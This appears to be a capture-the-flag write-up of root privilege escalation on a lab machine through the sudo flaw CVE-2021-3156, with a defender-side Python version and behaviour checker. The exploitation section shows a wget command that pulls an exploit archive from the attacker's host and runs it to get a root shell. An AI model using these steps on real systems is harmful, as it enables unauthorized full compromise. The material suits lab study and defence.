CVE-2021-3156


PEAS has discovered that the target system is vulnerable to CVE-2021-3156

A vulnerability was found in sudo up to 1.8.31p2/1.9.5p1 (Operating System Utility Software). It has been rated as critical. This issue affects the function sudoers_policy_main. The manipulation with an unknown input leads to a heap-based overflow vulnerability. The problem is classified as CWE-122: a heap overflow condition is a buffer overflow where the buffer that can be overwritten is allocated in the heap portion of memory, generally meaning that the buffer was allocated using a routine such as malloc(). Impacted are confidentiality, integrity, and availability.
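Added here as a defender-side check, not part of the original writeup or of the exploit it uses: a small Python helper that maps a `sudo --version` string onto the affected ranges named above and interprets the `sudoedit -s /` test published with the advisory. It assumes Python 3 and, for the live check only, a `sudoedit` binary on PATH; the sample strings fed to it are constructed.

```python
import re
import subprocess

# Affected upstream ranges for CVE-2021-3156 (Baron Samedit) as published
# with the advisory: 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1.
# Tuples are (major, minor, patch, p-level).
AFFECTED_RANGES = [
    ((1, 8, 2, 0), (1, 8, 31, 2)),
    ((1, 9, 0, 0), (1, 9, 5, 1)),
]

VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text):
    """Turn 'Sudo version 1.8.31' or '1.9.5p1' into a comparable tuple;
    the p-level is 0 when the version carries no 'pN' suffix."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError("no sudo version found in: %r" % text)
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_in_affected_range(version):
    """True if the upstream version number falls in an affected range.
    Caveat: distributions backport the fix without changing the upstream
    number, so a version match is a hint only; trust the behavioural test."""
    return any(lo <= version <= hi for lo, hi in AFFECTED_RANGES)


def classify_sudoedit_output(stderr_text):
    """Interpret stderr of 'sudoedit -s /': a vulnerable sudo reaches the
    file check and complains that '/' is not a regular file, a patched sudo
    rejects -s for sudoedit during argument parsing and prints usage."""
    if "not a regular file" in stderr_text:
        return "vulnerable"
    if stderr_text.startswith("usage:"):
        return "patched"
    return "unknown"


def behavioural_check(timeout=5):
    """Run the advisory's test on this host as an unprivileged user.
    stdin is closed and a timeout set so a password prompt cannot hang us;
    that case comes back as 'unknown' rather than a false verdict."""
    try:
        proc = subprocess.run(["sudoedit", "-s", "/"], capture_output=True,
                              text=True, stdin=subprocess.DEVNULL,
                              timeout=timeout)
    except (OSError, subprocess.TimeoutExpired):
        return "unknown"
    return classify_sudoedit_output(proc.stderr)
```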

Exploit


Exploit found online

mango@mango:/dev/shm$ make ; gcc ; cc
 
Command 'make' not found, but can be installed with:
 
apt install make      
apt install make-guile
 
Ask your administrator to install one of them.
 
 
Command 'gcc' not found, but can be installed with:
 
apt install gcc
Please ask your administrator.
 
 
Command 'cc' not found, but can be installed with:
 
apt install gcc            
apt install clang          
apt install pentium-builder
apt install tcc            
 
Ask your administrator to install one of them.

Contrary to PEAS's claim, there are no compilers on the target system. Since the exploit is written in Python, I don't need to compile it.

Exploitation


mango@mango:/dev/shm$ wget -q http://10.10.16.8/CVE-2021-3156.tar.gz ; tar -xf CVE-2021-3156.tar.gz ; cd CVE-2021-3156

Delivery complete

mango@mango:/dev/shm/CVE-2021-3156$ ./exploit_nss.py 
# whoami
root
# hostname
mango
# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.10.10.162  netmask 255.255.255.0  broadcast 10.10.10.255
        inet6 fe80::250:56ff:feb9:ab29  prefixlen 64  scopeid 0x20<link>
        inet6 dead:beef::250:56ff:feb9:ab29  prefixlen 64  scopeid 0x0<global>
        ether 00:50:56:b9:ab:29  txqueuelen 1000  (Ethernet)
        RX packets 19799097  bytes 3144521457 (3.1 GB)
        RX errors 0  dropped 89  overruns 0  frame 0
        TX packets 18693113  bytes 9751345719 (9.7 GB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 160309  bytes 13179497 (13.1 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 160309  bytes 13179497 (13.1 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System Level Compromise